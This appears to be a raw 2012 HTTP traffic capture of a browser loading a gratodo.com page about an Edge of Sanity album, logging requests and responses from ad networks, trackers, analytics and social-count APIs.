User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0514.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sat, 17 Nov 2012 03:12:51 GMT
Expires: Sat, 17 Nov 2012 03:12:51 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /p?c1=8&c2=7936279&c3=0&cv=2.0&cj=1 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=7936279&amp;c3=0&amp;cv=2.0&amp;cj=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 302 Moved Temporarily

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://b.scorecardresearch.com/p2?c1=8&amp;c2=7936279&amp;c3=0&amp;cv=2.0&amp;cj=1
Date: Sat, 17 Nov 2012 03:12:51 GMT
Connection: keep-alive
Set-Cookie: UID=e0d07-195.159.219.9-1353121971; expires=Fri, 07-Nov-2014 03:12:51 GMT; path=/; domain=.scorecardresearch.com UIDR=1353121971; expires=Fri, 07-Nov-2014 03:12:51 GMT; path=/; domain=.scorecardresearch.com
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /st?ad_type=ad&ad_size=728x90&section=1312813&position=btf&t_url=http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal HTTP/1.1

Host: ts.smowtion.com
GET /st?ad_type=ad&amp;ad_size=728x90&amp;section=1312813&amp;position=btf&amp;t_url=http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
Cookie: suid=&quot;eyJ2ZXJzaW9uIjogIjAuMSIsICJ2YWx1ZSI6ICIwNDk0ZjAwZS1jYjc0LTQ5NDItYjE2Yy03Y2Y5YmI5NTYyYWMifQ==&quot;
HTTP/1.1 404 Not Found

Content-Type: text/html; charset=UTF-8
Content-Encoding: gzip
Date: Sat, 17 Nov 2012 03:12:48 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 20
Connection: keep-alive
GET /pixel/p-70x45KyHA6cIs.gif?media=ad HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Set-Cookie: mc=50a700b3-52822-65463-bd3fb; expires=Mon, 19-May-2014 03:12:51 GMT; path=/; domain=.quantserve.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV&quot;
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: QS
GET /p2?c1=8&c2=7936279&c3=0&cv=2.0&cj=1 HTTP/1.1

Host: b.scorecardresearch.com
GET /p2?c1=8&amp;c2=7936279&amp;c3=0&amp;cv=2.0&amp;cj=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
Cookie: UID=e0d07-195.159.219.9-1353121971; UIDR=1353121971
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Nov 2012 03:12:51 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /s2/oz/images/stars/po/Publisher/sprite4-a67f741843ffc4220554c34bd01bb0bb.png HTTP/1.1

Host: ssl.gstatic.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Thu, 13 Sep 2012 21:47:55 GMT
Date: Fri, 16 Nov 2012 11:57:54 GMT
Expires: Sat, 16 Nov 2013 11:57:54 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 21399
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 54897
GET /ptj?member=541&size=120x600&inv_code=2565664&referrer=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D120x600%26section%3D2565664 HTTP/1.1

Host: ib.adnxs.com
GET /ptj?member=541&amp;size=120x600&amp;inv_code=2565664&amp;referrer=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&amp;redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D120x600%26section%3D2565664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
Cookie: uuid2=5858721859426781856; anj=Kfu=8fG3x=Cxrx)0s]#%2L_'x%SEV/hnKu94FV*Okf*):kb10I3^brp/%-cHfwr5q'`VH$4w=ef; sess=1; icu=ChII3I4BEAoYASABKAEwsoGchQUQsoGchQUYAA..; acb892086=-@L6Dj/d_6^qfy.Qz[m]rNx1b?enc=AQAAAAAA_D_NzMzMzMz3PwAAAEDheqQ_zczMzMzM9z8AAAAAAAD8P-nFbpDHTcUNoArzhH1cTlGyAKdQAAAAAMVYAwAdAgAA1gEAAAIAAADiJTwAk8AAAAAAAQBVU0QAVVNEANQBPABn2wAAt0oBAgUCAQUAAIIANSWrvQAAAAA.&amp;tt_code=2565664&amp;cnd=%216R0KhwiTsCcQ4svwARgAIJOBAzAAOOe2B0AASNYDUMWxDVgBYNgGaABwDHgigAFUiAEAkAEBmAEBoAEBqAECsAEAuQEAAAAAAAD8P8EBAAAAAAAA_D_JAYl5On5sycg_2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+1317%2C+1353121970%29%3Buf%28%27c%27%2C+645139%2C+1353121970%29%3Buf%28%27r%27%2C+3941858%2C+1353121970%29%3Bppv%281339%2C+%27992284812422071785%27%2C+1353121970%2C+1353726770%2C+645139%2C+49299%2C+0%2C+0%2C+1209600%29%3Bppv%2848189%2C+%27992284812422071785%27%2C+1353121970%2C+1353726770%2C+645139%2C+49299%2C+0%2C+0%2C+10368000%29%3B&amp;ccd=%21cAU_MQiTsCcQ4svwARiTgQMgAA..&amp;vpid=45&amp;creative_click=http%3A%2F%2Fwww.dnafootwear.com%2Fseychelles%3Fsec%3Dwomen%3Futm_source%3DVISISEEK%26utm_medium%3DVISISEEK-RTB-Display%26utm_campaign%3DVISISEEK-Remarketing&amp;media_subtypes=1&amp;dlo=1
HTTP/1.1 200 OK

Content-Type: text/javascript
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref=&quot;http://cdn.adnxs.com/w3c/policy/p3p.xml&quot;, CP=&quot;NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE&quot;
X-XSS-Protection: 0
Set-Cookie: uuid2=5858721859426781856; path=/; expires=Fri, 15-Feb-2013 03:12:51 GMT; domain=.adnxs.com; HttpOnly sess=1; path=/; expires=Sun, 18-Nov-2012 03:12:51 GMT; domain=.adnxs.com; HttpOnly icu=ChII3I4BEAoYAiACKAIws4GchQUQs4GchQUYAQ..; path=/; expires=Fri, 15-Feb-2013 03:12:51 GMT; domain=.adnxs.com; HttpOnly acb811934=-@L6DKU&gt;mMDkh[4U5lrgrk=:c?enc=P4hkyLE1_T822rtQCtT4PwAAAOBRuL4_Ntq7UArU-D9AiGTIsTX9P-pSJjb0PAp2oArzhH1cTlGzAKdQAAAAAMVYAwAdAgAANQEAAAIAAACKpxkAk8AAAAAAAQBVU0QAVVNEAHgAWAJn2wAAn08BAgUCAQUAAIIAfiVdNAAAAAA.&amp;tt_code=2565664&amp;cnd=%21OyHl1QjWrwIQis9mGAAgk4EDMAA457YHQABItQJQxbENWABg2AZoAHAAeACAAYwJiAEAkAEBmAEBoAEBqAEDsAEAuQFTGwP5sTX9P8EBUxsD-bE1_T_JAeK8rFAheQNA2QEAAAAAAADwP-ABAA..&amp;udj=uf%28%27a%27%2C+6895%2C+1353121971%29%3Buf%28%27r%27%2C+1681290%2C+1353121971%29%3Bppv%288054%2C+%278505677865820771050%27%2C+1353121971%2C+1353726771%2C+38870%2C+49299%2C+0%2C+0%2C+604800%29%3B&amp;ccd=%21rgQeKAjWrwIQis9mGJOBAyAA&amp;vpid=45&amp;media_subtypes=1&amp;dlo=1; path=/; expires=Sun, 18-Nov-2012 03:12:51 GMT; domain=.adnxs.com; HttpOnly anj=Kfu=8fG68%Cxrx)0s]#%2L_'x%SEV/hnJPh4FV*Okf*):kb10I3^brp/%-cHfwr5q'`Vcbd%_OTI1zD&lt;!*rB-nwF(_; path=/; expires=Fri, 15-Feb-2013 03:12:51 GMT; domain=.adnxs.com; HttpOnly
Date: Sat, 17 Nov 2012 03:12:51 GMT
Content-Length: 329
GET /yts/imgbin/www-refresh-vflrvDBWB.png HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://s.ytimg.com/yts/cssbin/www-embed-vflwCxCa2.css
HTTP/1.1 200 OK

Content-Type: image/png
Last-Modified: Tue, 06 Nov 2012 19:58:12 GMT
Date: Fri, 16 Nov 2012 11:57:56 GMT
Expires: Sat, 16 Nov 2013 11:57:56 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 40884
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 54895
GET /imp?Z=468x60&anmember=541&anprice=140&s=2565664&_salt=1609769567&B=10&r=0 HTTP/1.1

Host: ad.yieldmanager.com
GET /imp?Z=468x60&amp;anmember=541&amp;anprice=140&amp;s=2565664&amp;_salt=1609769567&amp;B=10&amp;r=0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=468x60&amp;section=2565664
HTTP/1.1 302 Found

HTTP/1.1 302 Found
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0936.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=138si277u/*http%3A//ad.yieldmanager.com/imp?Z=468x60&amp;anmember=541&amp;anprice=140&amp;s=2565664&amp;_salt=1609769567&amp;B=10&amp;r=0
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sat, 17 Nov 2012 03:12:51 GMT
Expires: Sat, 17 Nov 2012 03:12:51 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /pixel.gif?id=1312813 HTTP/1.1

Host: pxses.smowtion.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/gif
Cache-Control: no-cache, no-store, must-revalidate
Content-Encoding: gzip
Date: Sat, 17 Nov 2012 03:12:57 GMT
Last-Modified: Wed, 11 Jul 2012 18:23:37 GMT
Pragma: no-cache
Server: nginx
Vary: Accept-Encoding
Content-Length: 57
Connection: keep-alive
GET /swidget/p7a0iun6gxsy.png HTTP/1.1

Host: whos.amung.us

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
Cookie: uid=CgH9HlCnALBT4lNwUKgEAg==
HTTP/1.1 303 See Other

Content-Type: text/html
Date: Sat, 17 Nov 2012 03:12:51 GMT
Transfer-Encoding: chunked
Connection: close
Location: http://widgets.amung.us/small/00/25.png
GET /wp-content/plugins/ic-besocial/images/footbesocial.gif HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/plugins/ic-besocial/besocial.css?ver=2.0
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:33:06 GMT
Etag: &quot;3b4582-337-4afd4246ea080&quot;
Accept-Ranges: bytes
Content-Length: 823
Keep-Alive: timeout=20, max=196
Connection: Keep-Alive
GET /wp-content/plugins/ic-besocial/besocial.png?v2.0 HTTP/1.1

Host: gratodo.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/wp-content/plugins/ic-besocial/besocial.css?ver=2.0
HTTP/1.1 200 OK

Content-Type: image/png
Date: Sat, 17 Nov 2012 03:12:51 GMT
Server: Apache/2.2.22 (Unix) mod_ssl/2.2.22 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Fri, 21 Oct 2011 19:32:58 GMT
Etag: &quot;3b457a-23a4-4afd423f48e80&quot;
Accept-Ranges: bytes
Content-Length: 9124
Keep-Alive: timeout=20, max=195
Connection: Keep-Alive
GET /p?c1=8&c2=7936279&c3=0&cv=2.0&cj=1 HTTP/1.1

Host: b.scorecardresearch.com
GET /p?c1=8&amp;c2=7936279&amp;c3=0&amp;cv=2.0&amp;cj=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
Cookie: UID=e0d07-195.159.219.9-1353121971; UIDR=1353121971
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Sat, 17 Nov 2012 03:12:52 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /js//ice.js HTTP/1.1

Host: resources.infolinks.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/html; charset=UTF-8
Accept-Ranges: bytes
Date: Sat, 17 Nov 2012 03:12:52 GMT
Last-Modified: Fri, 16 Nov 2012 06:14:22 GMT
Server: ECS (arn/46E5)
X-Cache: HIT
X-Powered-By: PHP/5.2.17
Content-Length: 0
GET /url_info.jsonc?url=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&callback=BeSocial.twitter&asd=q HTTP/1.1

Host: api.tweetmeme.com
GET /url_info.jsonc?url=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&amp;callback=BeSocial.twitter&amp;asd=q HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 403 Forbidden

Content-Type: text/html
Server: nginx/0.7.67
Date: Sat, 17 Nov 2012 03:12:52 GMT
Transfer-Encoding: chunked
Connection: close
P3P: CP=&quot;CAO PSA&quot;
Content-Encoding: gzip
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14948
Content-Encoding: gzip
Last-Modified: Wed, 07 Nov 2012 22:33:51 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Fri, 16 Nov 2012 23:57:54 GMT
Expires: Sat, 17 Nov 2012 11:57:54 GMT
Vary: Accept-Encoding
Age: 11698
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /st?anmember=541&anprice=150&ad_type=ad&ad_size=120x600&section=2565664 HTTP/1.1

Host: ad.yieldmanager.com
GET /st?anmember=541&amp;anprice=150&amp;ad_type=ad&amp;ad_size=120x600&amp;section=2565664 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://adserving.cpxinteractive.com/st?ad_type=iframe&amp;ad_size=120x600&amp;section=2565664
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Date: Sat, 17 Nov 2012 03:12:52 GMT
Server: YTS/1.20.13
X-RightMedia-Hostname: raptor0046.rm.bf1.yahoo.com
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Vary: *
Last-Modified: Sat, 17 Nov 2012 03:12:52 GMT
Expires: Sat, 17 Nov 2012 03:12:52 GMT
Pragma: no-cache
Content-Encoding: gzip
Age: 0
Transfer-Encoding: chunked
Connection: keep-alive
GET /api/url.php?url=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&jsonp=BeSocial.meneame&asd=q HTTP/1.1

Host: www.meneame.net
GET /api/url.php?url=http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&amp;jsonp=BeSocial.meneame&amp;asd=q HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: application/json; charset=utf-8
Content-Encoding: gzip
Date: Sat, 17 Nov 2012 03:12:52 GMT
Server: nginx/0.7.65
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.2-1ubuntu4.18
Content-Length: 154
Connection: keep-alive
GET /__utm.gif?utmwv=5.3.8&utms=1&utmn=4375951&utmhn=gratodo.com&utmcs=UTF-8&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=Edge%20of%20Sanity%20%E2%80%93%20Cryptic%20(1997)%5BMU%2FFS%5D(Progressive%20Death%20Metal)%20%7C%20gratodo.com&utmhid=796740474&utmr=-&utmp=%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&utmac=UA-18022800-12&utmcc=__utma%3D165203049.525879842.1353121973.1353121973.1353121973.1%3B%2B__utmz%3D165203049.1353121973.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=q~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=1&amp;utmn=4375951&amp;utmhn=gratodo.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=1159x778&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=Edge%20of%20Sanity%20%E2%80%93%20Cryptic%20(1997)%5BMU%2FFS%5D(Progressive%20Death%20Metal)%20%7C%20gratodo.com&amp;utmhid=796740474&amp;utmr=-&amp;utmp=%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal&amp;utmac=UA-18022800-12&amp;utmcc=__utma%3D165203049.525879842.1353121973.1353121973.1353121973.1%3B%2B__utmz%3D165203049.1353121973.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&amp;utmu=q~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 11:57:54 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 54898
Server: GFE/2.0
GET /yts/swfbin/watch_as3-vfle2krMl.swf HTTP/1.1

Host: s.ytimg.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.youtube.com/embed/9VLAHAyABVY
HTTP/1.1 200 OK

Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 15 Nov 2012 17:53:19 GMT
Date: Fri, 16 Nov 2012 11:57:55 GMT
Expires: Sat, 16 Nov 2013 11:57:55 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 281246
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 54897
GET /restserver.php?v=1.0&method=fql.query&query=select%20total_count%20from%20link_stat%20where%20url%3D%22http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal%22&format=json&callback=BeSocial.facebook&asd=q HTTP/1.1

Host: api.facebook.com
GET /restserver.php?v=1.0&amp;method=fql.query&amp;query=select%20total_count%20from%20link_stat%20where%20url%3D%22http%3A%2F%2Fgratodo.com%2Fedge-of-sanity-cryptic-1997mufsprogressive-death-metal%22&amp;format=json&amp;callback=BeSocial.facebook&amp;asd=q HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gratodo.com/edge-of-sanity-cryptic-1997mufsprogressive-death-metal
HTTP/1.1 200 OK

Content-Type: text/javascript;charset=utf-8
Access-Control-Allow-Origin: *
Cache-Control: public, max-age=60
Expires: Fri, 16 Nov 2012 19:13:52 -0800
X-FB-Rev: 674114
X-FB-Debug: oF1hZiXGQz8A0dGh5FO9nyFEEcBVE2pGZtoIAirBwEo=
Date: Sat, 17 Nov 2012 03:12:52 GMT
Connection: keep-alive
Content-Length: 39
